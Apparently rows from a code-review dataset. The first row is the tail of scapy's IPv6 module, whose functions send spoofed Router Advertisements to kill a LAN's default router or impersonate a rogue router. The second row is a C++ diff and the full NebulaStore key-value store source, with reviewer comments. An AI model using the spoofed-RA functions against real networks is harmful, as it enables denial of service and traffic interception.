if req[ICMPv6ND_RA].routerlifetime == 0:
return 0
return 1
def ra_reply_callback(req, reply_mac, tgt_mac, iface):
"""
Callback that sends an RA with a 0 lifetime
"""
# Let's build a reply and send it
src = req[IPv6].src
# Prepare packets parameters
ether_params = {}
if reply_mac:
ether_params["src"] = reply_mac
if tgt_mac:
ether_params["dst"] = tgt_mac
# Basis of fake RA (high pref, zero lifetime)
rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1")
rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
# Add it a PIO from the request ...
tmp = req
while ICMPv6NDOptPrefixInfo in tmp:
pio = tmp[ICMPv6NDOptPrefixInfo]
tmp = pio.payload
del(pio.payload)
rep /= pio
# ... and source link layer address option
if ICMPv6NDOptSrcLLAddr in req:
mac = req[ICMPv6NDOptSrcLLAddr].lladdr
else:
mac = req[Ether].src
rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
sendp(rep, iface=iface, verbose=0)
print("Fake RA sent with source address %s" % src)
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
iface=iface)
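# Illustrative usage sketch (not part of the original module; the MAC address is
# a placeholder): invalidate only the default router that advertises itself from
# this specific Ethernet source address.
#
# NDP_Attack_Kill_Default_Router(iface="eth0",
#                                mac_src_filter="00:13:72:8c:b5:69")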
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
ip_src_filter=None):
"""
The purpose of this function is to send provided RA message at layer 2
(i.e. providing a packet starting with IPv6 will not work) in response
to received RS messages. In the end, the function is a simple wrapper
around sendp() that monitor the link for RS messages.
It is probably better explained with an example:
>>> ra = Ether()/IPv6()/ICMPv6ND_RA()
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
>>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
>>> NDP_Attack_Fake_Router(ra, iface="eth0")
Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
...
Following arguments can be used to change the behavior:
ra: the RA message to send in response to received RS message.
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If none is provided, conf.iface is
used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RS messages received from this source will trigger a reply.
Note that no changes to the provided RA are done, which implies that if
you intend to target only the source of the RS using this option,
you will have to set the Ethernet destination address to the same
value in your RA.
The default value for this parameter is None: no filtering on the
source of RS is done.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RS messages received from this source address will trigger
replies. Same comment as for the previous argument applies: if you use
the option, you will probably want to set a specific Ethernet
destination address in the RA.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
return 1
def ra_reply_callback(req, iface):
"""
Callback that sends an RA in reply to an RS
"""
src = req[IPv6].src
sendp(ra, iface=iface, verbose=0)
print("Fake RA sent in response to RS from %s" % src)
if not iface:
iface = conf.iface
sniff_filter = "icmp6"
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, iface),
iface=iface)
#############################################################################
#############################################################################
### Layers binding ###
#############################################################################
#############################################################################
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, _IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46)
bind_layers(Ether, IPv6, type = 0x86dd )
bind_layers(CookedLinux, IPv6, proto = 0x86dd )
bind_layers(GRE, IPv6, proto = 0x86dd )
bind_layers(Loopback, IPv6, type = 0x1c )
bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP )
bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP )
bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP )
bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP )
bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
bind_layers(IPv6, GRE, nh = socket.IPPROTO_GRE )
| 1 | 10,289 | `isinstance(ip6, Net6)` instead | secdev-scapy | py |
@@ -359,10 +359,12 @@ ResultCode NebulaStore::get(GraphSpaceID spaceId,
}
-ResultCode NebulaStore::multiGet(GraphSpaceID spaceId,
- PartitionID partId,
- const std::vector<std::string>& keys,
- std::vector<std::string>* values) {
+ErrorOr<ResultCode, std::vector<Status>> NebulaStore::multiGet(
+ GraphSpaceID spaceId,
+ PartitionID partId,
+ const std::vector<std::string>& keys,
+ std::vector<std::string>* values,
+ bool returnPartly) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret); | 1 | /* Copyright (c) 2018 vesoft inc. All rights reserved.
*
* This source code is licensed under Apache 2.0 License,
* attached with Common Clause Condition 1.0, found in the LICENSES directory.
*/
#include "base/Base.h"
#include "kvstore/NebulaStore.h"
#include <folly/Likely.h>
#include <algorithm>
#include <cstdint>
#include "network/NetworkUtils.h"
#include "fs/FileUtils.h"
#include "kvstore/RocksEngine.h"
#include "kvstore/SnapshotManagerImpl.h"
DEFINE_string(engine_type, "rocksdb", "rocksdb, memory...");
DEFINE_int32(custom_filter_interval_secs, 24 * 3600, "interval to trigger custom compaction");
DEFINE_int32(num_workers, 4, "Number of worker threads");
DEFINE_bool(check_leader, true, "Check leader or not");
namespace nebula {
namespace kvstore {
NebulaStore::~NebulaStore() {
LOG(INFO) << "Cut off the relationship with meta client";
options_.partMan_.reset();
LOG(INFO) << "Stop the raft service...";
raftService_->stop();
LOG(INFO) << "Waiting for the raft service stop...";
raftService_->waitUntilStop();
spaces_.clear();
bgWorkers_->stop();
bgWorkers_->wait();
LOG(INFO) << "~NebulaStore()";
}
bool NebulaStore::init() {
LOG(INFO) << "Start the raft service...";
bgWorkers_ = std::make_shared<thread::GenericThreadPool>();
bgWorkers_->start(FLAGS_num_workers, "nebula-bgworkers");
snapshot_.reset(new SnapshotManagerImpl(this));
raftService_ = raftex::RaftexService::createService(ioPool_,
workers_,
raftAddr_.second);
if (!raftService_->start()) {
LOG(ERROR) << "Start the raft service failed";
return false;
}
CHECK(!!options_.partMan_);
LOG(INFO) << "Scan the local path, and init the spaces_";
{
for (auto& path : options_.dataPaths_) {
auto rootPath = folly::stringPrintf("%s/nebula", path.c_str());
auto dirs = fs::FileUtils::listAllDirsInDir(rootPath.c_str());
for (auto& dir : dirs) {
LOG(INFO) << "Scan path \"" << path << "/" << dir << "\"";
try {
GraphSpaceID spaceId;
try {
spaceId = folly::to<GraphSpaceID>(dir);
} catch (const std::exception& ex) {
LOG(ERROR) << "Data path invalid: " << ex.what();
return false;
}
if (!options_.partMan_->spaceExist(storeSvcAddr_, spaceId).ok()) {
// TODO We might want to have a second thought here.
// Removing the data directly feels a little strong
LOG(INFO) << "Space " << spaceId
<< " does not exist any more, remove the data!";
auto dataPath = folly::stringPrintf("%s/%s",
rootPath.c_str(),
dir.c_str());
CHECK(fs::FileUtils::remove(dataPath.c_str(), true));
continue;
}
KVEngine* enginePtr = nullptr;
{
folly::RWSpinLock::WriteHolder wh(&lock_);
auto engine = newEngine(spaceId, path);
auto spaceIt = this->spaces_.find(spaceId);
if (spaceIt == this->spaces_.end()) {
LOG(INFO) << "Load space " << spaceId << " from disk";
spaceIt = this->spaces_.emplace(
spaceId,
std::make_unique<SpacePartInfo>()).first;
}
spaceIt->second->engines_.emplace_back(std::move(engine));
enginePtr = spaceIt->second->engines_.back().get();
}
// partIds is the partition in this host waiting to open
std::vector<PartitionID> partIds;
for (auto& partId : enginePtr->allParts()) {
if (!options_.partMan_->partExist(storeSvcAddr_, spaceId, partId).ok()) {
LOG(INFO) << "Part " << partId
<< " does not exist any more, remove it!";
enginePtr->removePart(partId);
continue;
} else {
partIds.emplace_back(partId);
}
}
if (partIds.empty()) {
continue;
}
std::atomic<size_t> counter(partIds.size());
folly::Baton<true, std::atomic> baton;
LOG(INFO) << "Need to open " << partIds.size() << " parts of space " << spaceId;
for (auto& partId : partIds) {
bgWorkers_->addTask([
spaceId, partId, enginePtr, &counter, &baton, this] () mutable {
auto part = std::make_shared<Part>(spaceId,
partId,
raftAddr_,
folly::stringPrintf("%s/wal/%d",
enginePtr->getDataRoot(),
partId),
enginePtr,
ioPool_,
bgWorkers_,
workers_,
snapshot_);
auto status = options_.partMan_->partMeta(spaceId, partId);
if (!status.ok()) {
LOG(WARNING) << status.status().toString();
return;
}
auto partMeta = status.value();
std::vector<HostAddr> peers;
for (auto& h : partMeta.peers_) {
if (h != storeSvcAddr_) {
peers.emplace_back(getRaftAddr(h));
VLOG(1) << "Add peer " << peers.back();
}
}
raftService_->addPartition(part);
part->start(std::move(peers), false);
LOG(INFO) << "Load part " << spaceId << ", " << partId << " from disk";
{
folly::RWSpinLock::WriteHolder holder(&lock_);
auto iter = spaces_.find(spaceId);
CHECK(iter != spaces_.end());
iter->second->parts_.emplace(partId, part);
}
counter.fetch_sub(1);
if (counter.load() == 0) {
baton.post();
}
});
}
baton.wait();
LOG(INFO) << "Load space " << spaceId << " complete";
} catch (std::exception& e) {
LOG(FATAL) << "Invalid data directory \"" << dir << "\"";
}
}
}
}
LOG(INFO) << "Init data from partManager for " << storeSvcAddr_;
auto partsMap = options_.partMan_->parts(storeSvcAddr_);
for (auto& entry : partsMap) {
auto spaceId = entry.first;
addSpace(spaceId);
std::vector<PartitionID> partIds;
for (auto it = entry.second.begin(); it != entry.second.end(); it++) {
partIds.emplace_back(it->first);
}
std::sort(partIds.begin(), partIds.end());
for (auto& partId : partIds) {
addPart(spaceId, partId, false);
}
}
LOG(INFO) << "Register handler...";
options_.partMan_->registerHandler(this);
return true;
}
std::unique_ptr<KVEngine> NebulaStore::newEngine(GraphSpaceID spaceId,
const std::string& path) {
if (FLAGS_engine_type == "rocksdb") {
std::shared_ptr<KVCompactionFilterFactory> cfFactory = nullptr;
if (options_.cffBuilder_ != nullptr) {
cfFactory = options_.cffBuilder_->buildCfFactory(spaceId,
FLAGS_custom_filter_interval_secs);
}
return std::make_unique<RocksEngine>(spaceId,
path,
options_.mergeOp_,
cfFactory);
} else {
LOG(FATAL) << "Unknown engine type " << FLAGS_engine_type;
return nullptr;
}
}
ErrorOr<ResultCode, HostAddr> NebulaStore::partLeader(GraphSpaceID spaceId, PartitionID partId) {
folly::RWSpinLock::ReadHolder rh(&lock_);
auto it = spaces_.find(spaceId);
if (UNLIKELY(it == spaces_.end())) {
return ResultCode::ERR_SPACE_NOT_FOUND;
}
auto& parts = it->second->parts_;
auto partIt = parts.find(partId);
if (UNLIKELY(partIt == parts.end())) {
return ResultCode::ERR_PART_NOT_FOUND;
}
return getStoreAddr(partIt->second->leader());
}
void NebulaStore::addSpace(GraphSpaceID spaceId) {
folly::RWSpinLock::WriteHolder wh(&lock_);
if (this->spaces_.find(spaceId) != this->spaces_.end()) {
LOG(INFO) << "Space " << spaceId << " has existed!";
return;
}
LOG(INFO) << "Create space " << spaceId;
this->spaces_[spaceId] = std::make_unique<SpacePartInfo>();
for (auto& path : options_.dataPaths_) {
this->spaces_[spaceId]->engines_.emplace_back(newEngine(spaceId, path));
}
}
void NebulaStore::addPart(GraphSpaceID spaceId, PartitionID partId, bool asLearner) {
folly::RWSpinLock::WriteHolder wh(&lock_);
auto spaceIt = this->spaces_.find(spaceId);
CHECK(spaceIt != this->spaces_.end()) << "Space should exist!";
if (spaceIt->second->parts_.find(partId) != spaceIt->second->parts_.end()) {
LOG(INFO) << "[" << spaceId << "," << partId << "] has existed!";
return;
}
int32_t minIndex = -1;
int32_t index = 0;
int32_t minPartsNum = 0x7FFFFFFF;
auto& engines = spaceIt->second->engines_;
for (auto& engine : engines) {
if (engine->totalPartsNum() < minPartsNum) {
minPartsNum = engine->totalPartsNum();
minIndex = index;
}
index++;
}
CHECK_GE(minIndex, 0) << "engines number:" << engines.size();
const auto& targetEngine = engines[minIndex];
// Write the information into related engine.
targetEngine->addPart(partId);
spaceIt->second->parts_.emplace(
partId,
newPart(spaceId, partId, targetEngine.get(), asLearner));
LOG(INFO) << "Space " << spaceId << ", part " << partId
<< " has been added, asLearner " << asLearner;
}
std::shared_ptr<Part> NebulaStore::newPart(GraphSpaceID spaceId,
PartitionID partId,
KVEngine* engine,
bool asLearner) {
auto part = std::make_shared<Part>(spaceId,
partId,
raftAddr_,
folly::stringPrintf("%s/wal/%d",
engine->getDataRoot(),
partId),
engine,
ioPool_,
bgWorkers_,
workers_,
snapshot_);
auto metaStatus = options_.partMan_->partMeta(spaceId, partId);
if (!metaStatus.ok()) {
return nullptr;
}
auto partMeta = metaStatus.value();
std::vector<HostAddr> peers;
for (auto& h : partMeta.peers_) {
if (h != storeSvcAddr_) {
peers.emplace_back(getRaftAddr(h));
VLOG(1) << "Add peer " << peers.back();
}
}
raftService_->addPartition(part);
part->start(std::move(peers), asLearner);
return part;
}
void NebulaStore::removeSpace(GraphSpaceID spaceId) {
folly::RWSpinLock::WriteHolder wh(&lock_);
auto spaceIt = this->spaces_.find(spaceId);
auto& engines = spaceIt->second->engines_;
for (auto& engine : engines) {
auto parts = engine->allParts();
for (auto& partId : parts) {
engine->removePart(partId);
}
CHECK_EQ(0, engine->totalPartsNum());
}
this->spaces_.erase(spaceIt);
// TODO(dangleptr): Should we delete the data?
LOG(INFO) << "Space " << spaceId << " has been removed!";
}
void NebulaStore::removePart(GraphSpaceID spaceId, PartitionID partId) {
folly::RWSpinLock::WriteHolder wh(&lock_);
auto spaceIt = this->spaces_.find(spaceId);
if (spaceIt != this->spaces_.end()) {
auto partIt = spaceIt->second->parts_.find(partId);
if (partIt != spaceIt->second->parts_.end()) {
auto* e = partIt->second->engine();
CHECK_NOTNULL(e);
raftService_->removePartition(partIt->second);
partIt->second->reset();
spaceIt->second->parts_.erase(partId);
e->removePart(partId);
}
}
LOG(INFO) << "Space " << spaceId << ", part " << partId << " has been removed!";
}
void NebulaStore::updateSpaceOption(GraphSpaceID spaceId,
const std::unordered_map<std::string, std::string>& options,
bool isDbOption) {
if (isDbOption) {
for (const auto& kv : options) {
setDBOption(spaceId, kv.first, kv.second);
}
} else {
for (const auto& kv : options) {
setOption(spaceId, kv.first, kv.second);
}
}
}
ResultCode NebulaStore::get(GraphSpaceID spaceId,
PartitionID partId,
const std::string& key,
std::string* value) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret);
}
auto part = nebula::value(ret);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
return part->engine()->get(key, value);
}
ResultCode NebulaStore::multiGet(GraphSpaceID spaceId,
PartitionID partId,
const std::vector<std::string>& keys,
std::vector<std::string>* values) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret);
}
auto part = nebula::value(ret);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
return part->engine()->multiGet(keys, values);
}
ResultCode NebulaStore::range(GraphSpaceID spaceId,
PartitionID partId,
const std::string& start,
const std::string& end,
std::unique_ptr<KVIterator>* iter) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret);
}
auto part = nebula::value(ret);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
return part->engine()->range(start, end, iter);
}
ResultCode NebulaStore::prefix(GraphSpaceID spaceId,
PartitionID partId,
const std::string& prefix,
std::unique_ptr<KVIterator>* iter) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret);
}
auto part = nebula::value(ret);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
return part->engine()->prefix(prefix, iter);
}
ResultCode NebulaStore::rangeWithPrefix(GraphSpaceID spaceId,
PartitionID partId,
const std::string& start,
const std::string& prefix,
std::unique_ptr<KVIterator>* iter) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
return error(ret);
}
auto part = nebula::value(ret);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
return part->engine()->rangeWithPrefix(start, prefix, iter);
}
ResultCode NebulaStore::sync(GraphSpaceID spaceId,
PartitionID partId) {
auto partRet = part(spaceId, partId);
if (!ok(partRet)) {
return error(partRet);
}
auto part = nebula::value(partRet);
if (!checkLeader(part)) {
return ResultCode::ERR_LEADER_CHANGED;
}
auto ret = ResultCode::SUCCEEDED;
folly::Baton<true, std::atomic> baton;
part->sync([&] (kvstore::ResultCode code) {
ret = code;
baton.post();
});
baton.wait();
return ret;
}
void NebulaStore::asyncMultiPut(GraphSpaceID spaceId,
PartitionID partId,
std::vector<KV> keyValues,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncMultiPut(std::move(keyValues), std::move(cb));
}
void NebulaStore::asyncRemove(GraphSpaceID spaceId,
PartitionID partId,
const std::string& key,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncRemove(key, std::move(cb));
}
void NebulaStore::asyncMultiRemove(GraphSpaceID spaceId,
PartitionID partId,
std::vector<std::string> keys,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncMultiRemove(std::move(keys), std::move(cb));
}
void NebulaStore::asyncRemoveRange(GraphSpaceID spaceId,
PartitionID partId,
const std::string& start,
const std::string& end,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncRemoveRange(start, end, std::move(cb));
}
void NebulaStore::asyncRemovePrefix(GraphSpaceID spaceId,
PartitionID partId,
const std::string& prefix,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncRemovePrefix(prefix, std::move(cb));
}
void NebulaStore::asyncAtomicOp(GraphSpaceID spaceId,
PartitionID partId,
raftex::AtomicOp op,
KVCallback cb) {
auto ret = part(spaceId, partId);
if (!ok(ret)) {
cb(error(ret));
return;
}
auto part = nebula::value(ret);
part->asyncAtomicOp(std::move(op), std::move(cb));
}
ErrorOr<ResultCode, std::shared_ptr<Part>> NebulaStore::part(GraphSpaceID spaceId,
PartitionID partId) {
folly::RWSpinLock::ReadHolder rh(&lock_);
auto it = spaces_.find(spaceId);
if (UNLIKELY(it == spaces_.end())) {
return ResultCode::ERR_SPACE_NOT_FOUND;
}
auto& parts = it->second->parts_;
auto partIt = parts.find(partId);
if (UNLIKELY(partIt == parts.end())) {
return ResultCode::ERR_PART_NOT_FOUND;
}
return partIt->second;
}
ResultCode NebulaStore::ingest(GraphSpaceID spaceId) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto parts = engine->allParts();
for (auto part : parts) {
auto ret = this->engine(spaceId, part);
if (!ok(ret)) {
return error(ret);
}
auto path = folly::stringPrintf("%s/download/%d", value(ret)->getDataRoot(), part);
if (!fs::FileUtils::exist(path)) {
LOG(INFO) << path << " not existed";
continue;
}
auto files = nebula::fs::FileUtils::listAllFilesInDir(path.c_str(), true, "*.sst");
for (auto file : files) {
LOG(INFO) << "Ingesting extra file: " << file;
auto code = engine->ingest(std::vector<std::string>({file}));
if (code != ResultCode::SUCCEEDED) {
return code;
}
}
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::setOption(GraphSpaceID spaceId,
const std::string& configKey,
const std::string& configValue) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto code = engine->setOption(configKey, configValue);
if (code != ResultCode::SUCCEEDED) {
return code;
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::setDBOption(GraphSpaceID spaceId,
const std::string& configKey,
const std::string& configValue) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto code = engine->setDBOption(configKey, configValue);
if (code != ResultCode::SUCCEEDED) {
return code;
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::compact(GraphSpaceID spaceId) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
auto code = ResultCode::SUCCEEDED;
std::vector<std::thread> threads;
for (auto& engine : space->engines_) {
threads.emplace_back(std::thread([&engine, &code] {
auto ret = engine->compact();
if (ret != ResultCode::SUCCEEDED) {
code = ret;
}
}));
}
// Wait for all threads to finish
for (auto& t : threads) {
t.join();
}
return code;
}
ResultCode NebulaStore::flush(GraphSpaceID spaceId) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto code = engine->flush();
if (code != ResultCode::SUCCEEDED) {
return code;
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::createCheckpoint(GraphSpaceID spaceId, const std::string& name) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto code = engine->createCheckpoint(name);
if (code != ResultCode::SUCCEEDED) {
return code;
}
// create wal hard link for all parts
auto parts = engine->allParts();
for (auto& part : parts) {
auto ret = this->part(spaceId, part);
if (!ok(ret)) {
LOG(ERROR) << "Part not found. space : " << spaceId << " Part : " << part;
return error(ret);
}
auto walPath = folly::stringPrintf("%s/checkpoints/%s/wal/%d",
engine->getDataRoot(), name.c_str(), part);
auto p = nebula::value(ret);
if (!p->linkCurrentWAL(walPath.data())) {
return ResultCode::ERR_CHECKPOINT_ERROR;
}
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::dropCheckpoint(GraphSpaceID spaceId, const std::string& name) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
/**
* Drop checkpoint and wal together
**/
auto checkpointPath = folly::stringPrintf("%s/checkpoints/%s",
engine->getDataRoot(),
name.c_str());
LOG(INFO) << "Drop checkpoint : " << checkpointPath;
if (!fs::FileUtils::exist(checkpointPath)) {
continue;
}
if (!fs::FileUtils::remove(checkpointPath.data(), true)) {
LOG(ERROR) << "Drop checkpoint dir failed : " << checkpointPath;
return ResultCode::ERR_IO_ERROR;
}
}
return ResultCode::SUCCEEDED;
}
ResultCode NebulaStore::setWriteBlocking(GraphSpaceID spaceId, bool sign) {
auto spaceRet = space(spaceId);
if (!ok(spaceRet)) {
return error(spaceRet);
}
auto space = nebula::value(spaceRet);
for (auto& engine : space->engines_) {
auto parts = engine->allParts();
for (auto& part : parts) {
auto partRet = this->part(spaceId, part);
if (!ok(partRet)) {
LOG(ERROR) << "Part not found. space : " << spaceId << " Part : " << part;
return error(partRet);
}
auto p = nebula::value(partRet);
if (p->isLeader()) {
auto ret = ResultCode::SUCCEEDED;
p->setBlocking(sign);
if (sign) {
folly::Baton<true, std::atomic> baton;
p->sync([&ret, &baton] (kvstore::ResultCode code) {
if (kvstore::ResultCode::SUCCEEDED != code) {
ret = code;
}
baton.post();
});
baton.wait();
}
if (ret != ResultCode::SUCCEEDED) {
LOG(ERROR) << "Part sync failed. space : " << spaceId << " Part : " << part;
return ret;
}
}
}
}
return ResultCode::SUCCEEDED;
}
bool NebulaStore::isLeader(GraphSpaceID spaceId, PartitionID partId) {
folly::RWSpinLock::ReadHolder rh(&lock_);
auto spaceIt = spaces_.find(spaceId);
if (spaceIt != this->spaces_.end()) {
auto partIt = spaceIt->second->parts_.find(partId);
if (partIt != spaceIt->second->parts_.end()) {
return partIt->second->isLeader();
} else {
return false;
}
}
return false;
}
ErrorOr<ResultCode, KVEngine*> NebulaStore::engine(GraphSpaceID spaceId, PartitionID partId) {
folly::RWSpinLock::ReadHolder rh(&lock_);
auto it = spaces_.find(spaceId);
if (UNLIKELY(it == spaces_.end())) {
return ResultCode::ERR_SPACE_NOT_FOUND;
}
auto& parts = it->second->parts_;
auto partIt = parts.find(partId);
if (UNLIKELY(partIt == parts.end())) {
return ResultCode::ERR_PART_NOT_FOUND;
}
return partIt->second->engine();
}
ErrorOr<ResultCode, std::shared_ptr<SpacePartInfo>> NebulaStore::space(GraphSpaceID spaceId) {
folly::RWSpinLock::ReadHolder rh(&lock_);
auto it = spaces_.find(spaceId);
if (UNLIKELY(it == spaces_.end())) {
return ResultCode::ERR_SPACE_NOT_FOUND;
}
return it->second;
}
int32_t NebulaStore::allLeader(std::unordered_map<GraphSpaceID,
std::vector<PartitionID>>& leaderIds) {
folly::RWSpinLock::ReadHolder rh(&lock_);
int32_t count = 0;
for (const auto& spaceIt : spaces_) {
auto spaceId = spaceIt.first;
for (const auto& partIt : spaceIt.second->parts_) {
auto partId = partIt.first;
if (partIt.second->isLeader()) {
leaderIds[spaceId].emplace_back(partId);
++count;
}
}
}
return count;
}
bool NebulaStore::checkLeader(std::shared_ptr<Part> part) const {
return !FLAGS_check_leader || part->isLeader();
}
} // namespace kvstore
} // namespace nebula
| 1 | 28,238 | Do we really need the param here? If only partial results returned, we could return ResultCode::PARTIAL_RESULTS; | vesoft-inc-nebula | cpp |